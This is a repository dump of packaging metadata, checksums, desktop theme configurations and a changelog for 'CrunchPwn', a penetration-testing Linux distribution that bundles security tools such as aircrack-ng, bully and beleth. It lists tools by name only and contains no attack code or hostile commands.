13 | e833b2373759212caee68e641c6b90bdc8db546c 3455066 aircrack-ng_1.2~beta2.orig.tar.gz
14 | 259c4084d700cc2da2919977939ce25f9b13e008 11800 aircrack-ng_1.2~beta2-1.debian.tar.gz
15 | Checksums-Sha256:
16 | ce1f7bbb3e1088cd1ada63e09c574a9a9481cd8042f6395150e5f86b0b3dee45 3455066 aircrack-ng_1.2~beta2.orig.tar.gz
17 | f4ba106915f42fd5cbb8cdfaed57619913f212797b566321141d3b185a908080 11800 aircrack-ng_1.2~beta2-1.debian.tar.gz
18 | Files:
19 | 0c2a25ec609cc7452541138dfd822822 3455066 aircrack-ng_1.2~beta2.orig.tar.gz
20 | 5d39cfbf4b2feca9ceb63a0525bc485f 11800 aircrack-ng_1.2~beta2-1.debian.tar.gz
21 |
--------------------------------------------------------------------------------
/packages/aircrack-ng/aircrack-ng_1.2~beta2.orig.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/aircrack-ng/aircrack-ng_1.2~beta2.orig.tar.gz
--------------------------------------------------------------------------------
/packages/beleth/beleth_0.1-1.debian.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/beleth/beleth_0.1-1.debian.tar.gz
--------------------------------------------------------------------------------
/packages/beleth/beleth_0.1-1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (quilt)
2 | Source: beleth
3 | Binary: beleth
4 | Architecture: any
5 | Version: 0.1-1
6 | Maintainer: stderr
7 | Homepage: http://www.blackhatlibrary.net/Beleth
8 | Standards-Version: 3.9.3
9 | Build-Depends: debhelper (>= 8.0.0), libssh2-1-dev
10 | Package-List:
11 | beleth deb net extra
12 | Checksums-Sha1:
13 | 207f7c4251091826a81df834a08659bbcdb16b26 48406 beleth_0.1.orig.tar.gz
14 | c42ee8fb63e958d007e91f55b50d19022b329e14 10815 beleth_0.1-1.debian.tar.gz
15 | Checksums-Sha256:
16 | dfcc831c441607fd039b0ebb547418de46ac0655367984a8ddb22f442860850f 48406 beleth_0.1.orig.tar.gz
17 | cca671c0cd29d0d529dfb254939b5ba72cb408187591b32666d5736385c81dac 10815 beleth_0.1-1.debian.tar.gz
18 | Files:
19 | 1259987a223dfd07300c00c587e07e3d 48406 beleth_0.1.orig.tar.gz
20 | d23c8f63a5de1d8fb4c9bd1211512661 10815 beleth_0.1-1.debian.tar.gz
21 |
--------------------------------------------------------------------------------
/packages/beleth/beleth_0.1.orig.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/beleth/beleth_0.1.orig.tar.gz
--------------------------------------------------------------------------------
/packages/bluediving/bluediving_0.9-1.debian.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/bluediving/bluediving_0.9-1.debian.tar.gz
--------------------------------------------------------------------------------
/packages/bluediving/bluediving_0.9-1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (quilt)
2 | Source: bluediving
3 | Binary: bluediving
4 | Architecture: any
5 | Version: 0.9-1
6 | Maintainer: stderr
7 | Homepage: http://bluediving.sourceforge.net
8 | Standards-Version: 3.9.3
9 | Build-Depends: debhelper (>= 8.0.0), libopenobex1-dev, libxml2-dev, mpg123
10 | Package-List:
11 | bluediving deb admin extra
12 | Checksums-Sha1:
13 | 53f8cbd189ba4147e38bb86c58fa4bf17fc65445 845132 bluediving_0.9.orig.tar.gz
14 | ebdfa45e59aa48a6a2202f03e2ee327a263d53f7 120632 bluediving_0.9-1.debian.tar.gz
15 | Checksums-Sha256:
16 | 8d9eaac59c9b6d053e51e73ce7afeef74c2480e0e146e1ca16e7aa041b695cf6 845132 bluediving_0.9.orig.tar.gz
17 | 92af3abb77f3de7d2dcc42d10a476571d18057c81fa98b379d3d91d6d8f9656b 120632 bluediving_0.9-1.debian.tar.gz
18 | Files:
19 | 53365a068e7e65a2b047b96998ad3f9d 845132 bluediving_0.9.orig.tar.gz
20 | ff7ca86581a057df42603cd654b40fa6 120632 bluediving_0.9-1.debian.tar.gz
21 |
--------------------------------------------------------------------------------
/packages/bluediving/bluediving_0.9.orig.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/bluediving/bluediving_0.9.orig.tar.gz
--------------------------------------------------------------------------------
/packages/bluelog/bluelog_1.1.2-1.debian.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/bluelog/bluelog_1.1.2-1.debian.tar.gz
--------------------------------------------------------------------------------
/packages/bluelog/bluelog_1.1.2-1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (quilt)
2 | Source: bluelog
3 | Binary: bluelog
4 | Architecture: any
5 | Version: 1.1.2-1
6 | Maintainer: stderr
7 | Homepage: http://www.digifail.com/software/bluelog.shtml
8 | Standards-Version: 3.9.3
9 | Build-Depends: debhelper (>= 8.0.0)
10 | Package-List:
11 | bluelog deb admin extra
12 | Checksums-Sha1:
13 | 04fe6a63fd07838df89db7df2788085d48c996cd 105714 bluelog_1.1.2.orig.tar.gz
14 | ba7c911e347d4920ceff225965a45d4df7181bc6 1801 bluelog_1.1.2-1.debian.tar.gz
15 | Checksums-Sha256:
16 | 9750b007daffaffecea3b8dd2332bf74cc24955c307861197a20d04d845bc412 105714 bluelog_1.1.2.orig.tar.gz
17 | 65d6b298d23beb93c02ec54a8faf07bc2dc7e3127a246a7fb22162a2ef92adda 1801 bluelog_1.1.2-1.debian.tar.gz
18 | Files:
19 | 614d0fe65bae68acff1d33d9f86e4805 105714 bluelog_1.1.2.orig.tar.gz
20 | b742c2d37e7365599e9105aa140fd6ba 1801 bluelog_1.1.2-1.debian.tar.gz
21 |
--------------------------------------------------------------------------------
/packages/bluelog/bluelog_1.1.2.orig.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/bluelog/bluelog_1.1.2.orig.tar.gz
--------------------------------------------------------------------------------
/packages/bully/bully_1.0.22-1.debian.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/bully/bully_1.0.22-1.debian.tar.gz
--------------------------------------------------------------------------------
/packages/bully/bully_1.0.22-1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (quilt)
2 | Source: bully
3 | Binary: bully
4 | Architecture: any
5 | Version: 1.0.22-1
6 | Maintainer: stderr
7 | Homepage: http://github.com/bdpurcell/bully
8 | Standards-Version: 3.9.3
9 | Build-Depends: debhelper (>= 8.0.0)
10 | Package-List:
11 | bully deb net extra
12 | Checksums-Sha1:
13 | 3cdd92be085bf65c573b80fb32766c665858ad0d 894951 bully_1.0.22.orig.tar.gz
14 | 19a17a1cc275b78394edfadf4dac440e49179e24 7395 bully_1.0.22-1.debian.tar.gz
15 | Checksums-Sha256:
16 | 0f51e4c51bc62100cf4df20ce35d6396fc7e627698a5af08d0a83b33de9a84dd 894951 bully_1.0.22.orig.tar.gz
17 | 56eba013b3a95990da7892fa86a7a4cf3828840cc8245adbe8c0627a78ec76b9 7395 bully_1.0.22-1.debian.tar.gz
18 | Files:
19 | 49b5a5406cdb6eb3d00ae4c9c6e4f674 894951 bully_1.0.22.orig.tar.gz
20 | a8ca5d2fdf16a3752ecd75c89c927144 7395 bully_1.0.22-1.debian.tar.gz
21 |
--------------------------------------------------------------------------------
/packages/bully/bully_1.0.22.orig.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/bully/bully_1.0.22.orig.tar.gz
--------------------------------------------------------------------------------
/packages/clusterd/clusterd_0.1.1-1.debian.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/clusterd/clusterd_0.1.1-1.debian.tar.gz
--------------------------------------------------------------------------------
/packages/clusterd/clusterd_0.1.1-1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (quilt)
2 | Source: clusterd
3 | Binary: clusterd
4 | Architecture: all
5 | Version: 0.1.1-1
6 | Maintainer: stderr
7 | Homepage: https://github.com/hatRiot/clusterd
8 | Standards-Version: 3.9.3
9 | Build-Depends: debhelper (>= 8.0.0)
10 | Package-List:
11 | clusterd deb utils extra
12 | Checksums-Sha1:
13 | 73affd1bd43af74e2d94031a5e02d2b7d4ec34c1 9319324 clusterd_0.1.1.orig.tar.gz
14 | 5959848730bb73540c767190a1c37db4876b65e7 1885 clusterd_0.1.1-1.debian.tar.gz
15 | Checksums-Sha256:
16 | 9dd50015f728f1b6419d1ee020fbccc4477992ffbc789b8f7e3e147ffd032a52 9319324 clusterd_0.1.1.orig.tar.gz
17 | b645527c153d85cc024e34d9a5b42c83b7b76e7370cf75af9185c22a5a192831 1885 clusterd_0.1.1-1.debian.tar.gz
18 | Files:
19 | 4431ae7f94ff0a8f5e87bc5941a84047 9319324 clusterd_0.1.1.orig.tar.gz
20 | 7a9214538eee47096c2d3ebc1d60180e 1885 clusterd_0.1.1-1.debian.tar.gz
21 |
--------------------------------------------------------------------------------
/packages/clusterd/clusterd_0.1.1.orig.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/clusterd/clusterd_0.1.1.orig.tar.gz
--------------------------------------------------------------------------------
/packages/cp-backgrounds/cp-backgrounds.build:
--------------------------------------------------------------------------------
1 | ### Commented entries have reasonable defaults.
2 | ### Uncomment to edit them.
3 | # Source:
4 | Section: misc
5 | Priority: optional
6 | Homepage: http://www.crunchpwn.org
7 | Standards-Version: 3.9.2
8 |
9 | Package: cp-backgrounds
10 | Version: 0.1-1
11 | Maintainer: stderr
12 | # Pre-Depends:
13 | # Depends:
14 | # Recommends:
15 | # Suggests:
16 | # Provides:
17 | # Replaces:
18 | Architecture: all
19 | # Copyright:
20 | # Changelog:
21 | # Readme:
22 | # Extra-Files:
23 | Files: cp-default.png /usr/share/backgrounds/
24 | cp-login.png /usr/share/backgrounds/
25 | cp-boot.png /usr/share/backgrounds/
26 | Description: Default background themes for CrunchPwn
27 | Artwork done by cj .
28 |
--------------------------------------------------------------------------------
/packages/cp-backgrounds/cp-boot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/cp-backgrounds/cp-boot.png
--------------------------------------------------------------------------------
/packages/cp-backgrounds/cp-default.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/cp-backgrounds/cp-default.png
--------------------------------------------------------------------------------
/packages/cp-backgrounds/cp-login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/cp-backgrounds/cp-login.png
--------------------------------------------------------------------------------
/packages/cp-openbox-theme/cp-openbox-theme.build:
--------------------------------------------------------------------------------
1 | ### Commented entries have reasonable defaults.
2 | ### Uncomment to edit them.
3 | # Source:
4 | Section: misc
5 | Priority: optional
6 | Homepage: http://www.crunchpwn.org
7 | Standards-Version: 3.9.2
8 |
9 | Package: cp-openbox-theme
10 | Version: 0.1-3
11 | Maintainer: stderr
12 | # Pre-Depends:
13 | Depends: openbox, tint2, nitrogen, cp-backgrounds
14 | # Recommends:
15 | # Suggests:
16 | # Provides:
17 | Replaces: cb-configs
18 | Architecture: all
19 | # Copyright:
20 | # Changelog:
21 | # Readme:
22 | # Extra-Files:
23 | Files: openbox-3/bullet.xbm /usr/share/themes/crunchpwn/openbox-3/bullet.xpm
24 | openbox-3/close.xbm /usr/share/themes/crunchpwn/
25 | openbox-3/iconify.xbm /usr/share/themes/crunchpwn/
26 | openbox-3/max.xbm /usr/share/themes/crunchpwn/
27 | openbox-3/themerc /usr/share/themes/crunchpwn/
28 | openbox/menu.xml /etc/skel/.config/
29 | openbox/rc.xml /etc/skel/.config/
30 | openbox/autostart /etc/skel/.config/
31 | tint2/tint2rc /etc/skel/.config/
32 | nitrogen/bg-saved.cfg /etc/skel/.config/
33 | Description: Default openbox theme for CrunchPwn
34 | Default theme includes crazymothafucka + custom tint2rc.
35 |
--------------------------------------------------------------------------------
/packages/cp-openbox-theme/nitrogen/bg-saved.cfg:
--------------------------------------------------------------------------------
1 |
2 | [:0.0]
3 | file=/usr/share/backgrounds/cp-default.png
4 | mode=1
5 | bgcolor=#2e3436
6 |
--------------------------------------------------------------------------------
/packages/cp-openbox-theme/openbox-3/bullet.xbm:
--------------------------------------------------------------------------------
1 | #define bullet_width 10
2 | #define bullet_height 10
3 | static unsigned char bullet_bits[] = {
4 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x0c, 0x00, 0x1c, 0x00,
5 | 0x0c, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00 };
6 |
--------------------------------------------------------------------------------
/packages/cp-openbox-theme/openbox-3/close.xbm:
--------------------------------------------------------------------------------
1 | #define close_width 10
2 | #define close_height 10
3 | static unsigned char close_bits[] = {
4 | 0x00, 0x00, 0x00, 0x00, 0xcc, 0x00, 0xcc, 0x00, 0x00, 0x00, 0x00, 0x00,
5 | 0xcc, 0x00, 0xcc, 0x00, 0x00, 0x00, 0x00, 0x00 };
6 |
--------------------------------------------------------------------------------
/packages/cp-openbox-theme/openbox-3/iconify.xbm:
--------------------------------------------------------------------------------
1 | #define max_toggled_width 10
2 | #define max_toggled_height 10
3 | static unsigned char max_toggled_bits[] = {
4 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
5 | 0xcc, 0x00, 0xcc, 0x00, 0x00, 0x00, 0x00, 0x00 };
6 |
--------------------------------------------------------------------------------
/packages/cp-openbox-theme/openbox-3/max.xbm:
--------------------------------------------------------------------------------
1 | #define max_width 10
2 | #define max_height 10
3 | static unsigned char max_bits[] = {
4 | 0x00, 0x00, 0x00, 0x00, 0xcc, 0x00, 0xcc, 0x00, 0x00, 0x00, 0x00, 0x00,
5 | 0xc0, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00 };
6 |
--------------------------------------------------------------------------------
/packages/cp-openbox-theme/openbox-3/themerc:
--------------------------------------------------------------------------------
1 | !! an openbox theme based on the crazymothafucka gtk theme
2 | !! http://na12.deviantart.com
3 |
4 | !! menu title
5 | menu.title.bg: gradient vertical flat
6 | menu.title.bg.color: #1e1e1e
7 | menu.title.bg.colorTo: #1a1a1a
8 |
9 | menu.title.text.color:#989898
10 | menu.title.text.justify: center
11 |
12 | menu.separator.color:#151515
13 | menu.border.color: #2f2f2f
14 |
15 | !! menu items
16 | menu.items.bg: flat solid
17 | menu.items.bg.color:#151515
18 |
19 | menu.items.text.color:#717171
20 | menu.items.justify: left
21 | menu.items.disabled.text.color: #454545
22 | menu.items.active.bg: gradient vertical flat
23 | menu.items.active.bg.color:#d4f011
24 | menu.items.active.bg.colorTo:#A5AB1E
25 | menu.items.active.text.color:#ffffff
26 |
27 |
28 | !! window title
29 | window.active.title.bg: flat solid
30 | window.active.title.bg.color: #151515
31 | window.active.title.separator.color: #151515
32 |
33 | window.inactive.title.bg: flat solid
34 | window.inactive.title.bg.color: #151515
35 | window.inactive.title.separator.color: #151515
36 |
37 | !! window text
38 | window.label.text.justify: left
39 | window.active.label.bg: parentrelative
40 | window.active.label.bg.color: #151515
41 | window.active.label.text.color:#717171
42 | window.inactive.label.bg: parentrelative
43 | window.inactive.label.text.color: #454545
44 |
45 | !! window borders etc
46 | window.active.client.color: #ffffff
47 | window.inactive.client.color: #e0e0e0
48 |
49 | window.active.handle.bg:flat solid
50 | window.active.handle.bg.color:#151515
51 | window.active.grip.bg: parentrelative
52 | window.active.grip.bg.color: #151515
53 | window.active.button.disabled.bg: Flat
54 | window.active.button.disabled.bg.color: #151515
55 | window.active.button.disabled.image.color: #454545
56 |
57 |
58 | window.inactive.handle.bg: flat solid
59 | window.inactive.handle.bg.color: #151515
60 | window.inactive.grip.bg: parentrelative
61 | window.inactive.grip.bg.color: #151515
62 | !! window buttons
63 | window.active.button.unpressed.bg: parentrelative
64 | window.active.button.unpressed.bg.color:#151515
65 | window.active.button.*.image.color:#717171
66 | window.active.button.pressed.bg: parentrelative
67 | window.active.button.pressed.bg.color: #151515
68 | window.active.button.pressed.image.color:#d4f011
69 | window.inactive.button.*.bg: flat
70 | window.inactive.button.*.bg.color:#151515
71 | window.inactive.button.*.image.color:#454545
72 | window.inactive.button.disabled.bg: Flat
73 | window.inactive.button.disabled.bg.color: #151515
74 | window.inactive.button.disabled.bg.border.color: #151515
75 | window.inactive.button.disabled.image.color: #454545
76 |
77 | !! misc settings
78 | border.color: #2f2f2f
79 | border.width: 1
80 | padding.width: 5
81 | window.handle.width: 0
82 | window.client.padding.width: 0
83 | menu.overlap.x: 2
84 | menu.overlap.y: 0
85 | osd.hilight.bg: flat
86 | osd.hilight.bg.color: #2f2f2f
87 |
88 |
--------------------------------------------------------------------------------
/packages/cp-openbox-theme/openbox/autostart:
--------------------------------------------------------------------------------
1 | ## Openbox autostart.sh
2 | ## ====================
3 | ## When you login to your CrunchBang Openbox session, this autostart script
4 | ## will be executed to set-up your environment and launch any applications
5 | ## you want to run at startup.
6 | ##
7 | ## Note*: some programs, such as 'nm-applet' are run via XDG autostart.
8 | ## Run '/usr/lib/openbox/openbox-xdg-autostart --list' to list any
9 | ## XDG autostarted programs.
10 | ##
11 | ## More information about this can be found at:
12 | ## http://openbox.org/wiki/Help:Autostart
13 | ##
14 | ## If you do something cool with your autostart script and you think others
15 | ## could benefit from your hack, please consider sharing it at:
16 | ## http://crunchbang.org/forums/
17 |
18 | ## GNOME PolicyKit and Keyring
19 | eval $(gnome-keyring-daemon -s --components=pkcs11,secrets,ssh,gpg) &
20 |
21 | ## Set root window colour
22 | hsetroot -solid "#2E3436" &
23 |
24 | ## Group start:
25 | ## 1. nitrogen - restores wallpaper
26 | ## 2. compositor - start
27 | ## 3. sleep - give compositor time to start
28 | ## 4. tint2 panel
29 | (\
30 | nitrogen --restore && \
31 | cb-compositor --start && \
32 | sleep 2s && \
33 | tint2 \
34 | ) &
35 |
36 | ## Volume control for systray
37 | (sleep 2s && pnmixer) &
38 |
39 | ## Volume keys daemon
40 | xfce4-volumed &
41 |
42 | ## Enable power management
43 | xfce4-power-manager &
44 |
45 | ## Start Thunar Daemon
46 | thunar --daemon &
47 |
48 | ## Detect and configure touchpad. See 'man synclient' for more info.
49 | if egrep -iq 'touchpad' /proc/bus/input/devices; then
50 | synclient VertEdgeScroll=1 &
51 | synclient TapButton1=1 &
52 | fi
53 |
54 | ## Start xscreensaver
55 | xscreensaver -no-splash &
56 |
57 | ## Start Clipboard manager
58 | (sleep 3s && clipit) &
59 |
60 | ## Set keyboard settings - 250 ms delay and 25 cps (characters per second) repeat rate.
61 | ## Adjust the values according to your preferances.
62 | xset r rate 250 25 &
63 |
64 | ## Turn on/off system beep
65 | xset b off &
66 |
67 | ## The following command runs hacks and fixes for #! LiveCD sessions.
68 | ## Safe to delete after installation.
69 | cb-cowpowers &
70 |
--------------------------------------------------------------------------------
/packages/cp-openbox-theme/tint2/tint2rc:
--------------------------------------------------------------------------------
1 | # Tint2 config file
2 |
3 | # Background definitions
4 | # ID 1
5 | rounded = 0
6 | border_width = 1
7 | background_color = #000000 81
8 | border_color = #FFFFFF 40
9 |
10 | # ID 2
11 | rounded = 0
12 | border_width = 0
13 | background_color = #000000 100
14 | border_color = #97BF0D 60
15 |
16 | # ID 3
17 | rounded = 0
18 | border_width = 0
19 | background_color = #1F1F1F 27
20 | border_color = #FFFFFF 61
21 |
22 | # Panel
23 | panel_monitor = all
24 | panel_position = bottom center horizontal
25 | panel_size = 101% 26
26 | panel_margin = 0 -1
27 | panel_padding = 0 0 0
28 | panel_dock = 0
29 | wm_menu = 1
30 | panel_layer = bottom
31 | panel_background_id = 1
32 |
33 | # Panel Autohide
34 | autohide = 0
35 | autohide_show_timeout = 0.0
36 | autohide_hide_timeout = 0.0
37 | autohide_height = 0
38 | strut_policy = follow_size
39 |
40 | # Taskbar
41 | taskbar_mode = single_desktop
42 | taskbar_padding = 3 3 2
43 | taskbar_background_id = 0
44 | #taskbar_active_background_id = 0
45 |
46 | # Tasks
47 | urgent_nb_of_blink = 7
48 | task_icon = 0
49 | task_text = 1
50 | task_centered = 1
51 | task_maximum_size = 180 32
52 | task_padding = 6 0
53 | task_background_id = 0
54 | task_active_background_id = 0
55 | task_urgent_background_id = 0
56 | task_iconified_background_id = 0
57 |
58 | # Task Icons
59 | task_icon_asb = 100 0 0
60 | task_active_icon_asb = 100 0 0
61 | task_urgent_icon_asb = 100 0 0
62 | task_iconified_icon_asb = 100 0 0
63 |
64 | # Fonts
65 | task_font = Sans 7
66 | task_font_color = #FFFFFF 100
67 | task_active_font_color = #d4f011 100
68 | task_urgent_font_color = #FFFFFF 100
69 | task_iconified_font_color = #FFFFFF 75
70 | font_shadow = 0
71 |
72 | # System Tray
73 | systray = 1
74 | systray_padding = 0 4 10
75 | systray_sort = ascending
76 | systray_background_id = 0
77 | systray_icon_size = 0
78 | systray_icon_asb = 100 0 40
79 |
80 | # Clock
81 | time1_format = %a %b %e, %H:%M
82 | time1_font = Sans 7
83 | clock_font_color = #FFFFFF 67
84 | clock_padding = 10 0
85 | clock_background_id = 0
86 | clock_rclick_command = orage
87 |
88 | # Tooltips
89 | tooltip = 0
90 | tooltip_padding = 0 0
91 | tooltip_show_timeout = 0
92 | tooltip_hide_timeout = 0
93 | tooltip_background_id = 0
94 | tooltip_font = Sans 12
95 | tooltip_font_color = #FFFFFF 100
96 |
97 | # Mouse
98 | mouse_middle = none
99 | mouse_right = close
100 | mouse_scroll_up = toggle
101 | mouse_scroll_down = iconify
102 |
103 | # Battery
104 | battery = 0
105 | battery_low_status = 10
106 | battery_low_cmd = notify-send "battery low"
107 | battery_hide = 90
108 | bat1_font = sans 8
109 | bat2_font = sans 6
110 | battery_font_color = #FFFFFF 67
111 | battery_padding = 1 0
112 | battery_background_id = 0
113 |
--------------------------------------------------------------------------------
/packages/cp-slim-theme/background.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/cp-slim-theme/background.png
--------------------------------------------------------------------------------
/packages/cp-slim-theme/cp-slim-theme.build:
--------------------------------------------------------------------------------
1 | ### Commented entries have reasonable defaults.
2 | ### Uncomment to edit them.
3 | # Source:
4 | Section: admin
5 | Priority: optional
6 | Homepage: http://www.crunchpwn.org
7 | Standards-Version: 3.9.2
8 |
9 | Package: cp-slim-theme
10 | Version: 0.1
11 | Maintainer: stderr
12 | # Pre-Depends:
13 | Depends: slim
14 | # Recommends:
15 | # Suggests:
16 | # Provides:
17 | #Conflicts: slim, slimconf
18 | Replaces: slim, slimconf
19 | Architecture: all
20 | # Copyright:
21 | # Changelog:
22 | # Readme:
23 | # Extra-Files:
24 | Files: crunchpwn/background.png /usr/share/slim/themes/crunchpwn/
25 | crunchpwn/panel.png /usr/share/slim/themes/crunchpwn/
26 | crunchpwn/slim.theme /usr/share/slim/themes/crunchpwn/
27 | slim.conf /etc/
28 | #
29 | Description: Basic slim login theme for CrunchPwn
30 | Simple slim login theme for CrunchPwn distro.
31 |
32 |
--------------------------------------------------------------------------------
/packages/cp-slim-theme/panel.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/cp-slim-theme/panel.png
--------------------------------------------------------------------------------
/packages/cp-slim-theme/slim.conf:
--------------------------------------------------------------------------------
1 | # Path, X server and arguments (if needed)
2 | # Note: -xauth $authfile is automatically appended
3 | #
4 | default_path /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
5 | default_xserver /usr/bin/X11/X
6 | xserver_arguments -nolisten tcp
7 |
8 | # Commands for halt, login, etc.
9 | halt_cmd /sbin/shutdown -h now
10 | reboot_cmd /sbin/shutdown -r now
11 | console_cmd /usr/bin/xterm -C -fg white -bg black +sb -T "Console login" -e /bin/sh -c "/bin/cat /etc/issue.net; exec /bin/login"
12 | #suspend_cmd /usr/sbin/suspend
13 |
14 | # Full path to the xauth binary
15 | xauth_path /usr/bin/X11/xauth
16 |
17 | # Xauth file for server
18 | authfile /var/run/slim.auth
19 |
20 |
21 | # Activate numlock when slim starts. Valid values: on|off
22 | # numlock on
23 |
24 | # Hide the mouse cursor (note: does not work with some WMs).
25 | # Valid values: true|false
26 | # hidecursor false
27 |
28 | # This command is executed after a succesful login.
29 | # you can place the %session and %theme variables
30 | # to handle launching of specific commands in .xinitrc
31 | # depending of chosen session and slim theme
32 | #
33 | # NOTE: if your system does not have bash you need
34 | # to adjust the command according to your preferred shell,
35 | # i.e. for freebsd use:
36 | # login_cmd exec /bin/sh - ~/.xinitrc %session
37 | login_cmd exec /bin/bash -login /etc/X11/Xsession %session
38 |
39 | # Commands executed when starting and exiting a session.
40 | # They can be used for registering a X11 session with
41 | # sessreg. You can use the %user variable
42 | #
43 | sessionstart_cmd /usr/share/crunchbang/cb-user-setup %user
44 | # sessionstop_cmd some command
45 |
46 | # Start in daemon mode. Valid values: yes | no
47 | # Note that this can be overriden by the command line
48 | # options "-d" and "-nodaemon"
49 | # daemon yes
50 |
51 | # Available sessions (first one is the default).
52 | # The current chosen session name is replaced in the login_cmd
53 | # above, so your login command can handle different sessions.
54 | # see the xinitrc.sample file shipped with slim sources
55 | #sessions default,startxfce4,openbox,ion3,icewm,wmaker,blackbox,awesome
56 | sessions openbox-session
57 |
58 | # Executed when pressing F11 (requires imagemagick)
59 | screenshot_cmd scrot /root/slim.png
60 |
61 | # welcome message. Available variables: %host, %domain
62 | welcome_msg Welcome to %host
63 |
64 | # Session message. Prepended to the session name when pressing F1
65 | # session_msg Session:
66 |
67 | # shutdown / reboot messages
68 | shutdown_msg The system is halting...
69 | reboot_msg The system is rebooting...
70 |
71 | # default user, leave blank or remove this line
72 | # for avoid pre-loading the username.
73 | #default_user simone
74 |
75 | # Focus the password field on start when default_user is set
76 | # Set to "yes" to enable this feature
77 | #focus_password no
78 |
79 | # Automatically login the default user (without entering
80 | # the password. Set to "yes" to enable this feature
81 | #auto_login no
82 |
83 |
84 | # current theme, use comma separated list to specify a set to
85 | # randomly choose from
86 | #current_theme debian-spacefun
87 | current_theme crunchpwn
88 |
89 | # Lock file
90 | lockfile /var/run/slim.lock
91 |
92 | # Log file
93 | logfile /var/log/slim.log
94 |
95 |
--------------------------------------------------------------------------------
/packages/cp-slim-theme/slim.theme:
--------------------------------------------------------------------------------
1 | # CrunchBang theme for SLiM
2 | # by corenominal
3 |
4 | # Messages (ie: shutdown)
5 | msg_color #D8D8D8
6 | msg_font Liberation Mono:size=12:dpi=75
7 | msg_x 20%
8 | msg_y 40%
9 | msg_shadow_color #D8D8D8
10 | msg_shadow_xoffset 1
11 | msg_shadow_yoffset 1
12 |
13 | # valid values: stretch, tile
14 | background_style tile
15 | background_color #2E3436
16 |
17 | # Input controls
18 | input_panel_x 20%
19 | input_panel_y 35%
20 | input_name_x 59
21 | input_name_y 161
22 | input_font Liberation Sans:size=12:dpi=75
23 | input_fgcolor #151617
24 |
25 | # Username / password request
26 | username_font Liberation Mono:size=12:dpi=75
27 | #username_color #D8D8D8
28 | username_color #3fa335
29 | username_x 50%
30 | username_y 122
31 | password_x 50%
32 | password_y 122
33 | username_shadow_color #2E3436
34 | username_shadow_xoffset 0
35 | username_shadow_yoffset 0
36 |
37 | username_msg U S E R N A M E
38 | password_msg P A S S W O R D
39 |
--------------------------------------------------------------------------------
/packages/crunchpwn/changelog:
--------------------------------------------------------------------------------
1 | crunchpwn (0.1-8) unstable; urgency=low
2 |
3 | * Added uniscan
4 | * Added responder
5 | * Added zarp
6 | * Added clusterd
7 |
8 | -- stderr Tue, 11 Feb 2014 11:43:33 -0500
9 |
10 | crunchpwn (0.1-7) unstable; urgency=low
11 |
12 | * Full Alpha build
13 | * Added libyaml-libyaml-perl
14 | * Added missidentify
15 | * Added readpst
16 | * Added reglookup
17 | * Added extundelete
18 | * Added foremost
19 | * Added safecopy
20 | * Added tcpxtract
21 | * Added driftnet
22 | * Added samdump2
23 | * Added pyrit
24 | * Updated cp-openbox-theme with new menu
25 |
26 | -- stderr Fri, 31 Jan 2014 11:14:54 -0500
27 |
28 | crunchpwn (0.1-6) unstable; urgency=low
29 |
30 | * Nightly build 31-Jan-2014
31 | * Added wifijammer package
32 |
33 | -- stderr Fri, 31 Jan 2014 11:14:54 -0500
34 |
35 | crunchpwn (0.1-5) unstable; urgency=low
36 |
37 | * Nightly build 26-Jan-2014
38 | * Added wolpertinger package
39 |
40 | -- stderr Sun, 26 Jan 2014 16:26:23 -0500
41 |
42 | crunchpwn (0.1-4) unstable; urgency=low
43 |
44 | * Nightly build 22-Jan-2014
45 | * Added cp-backgrounds package
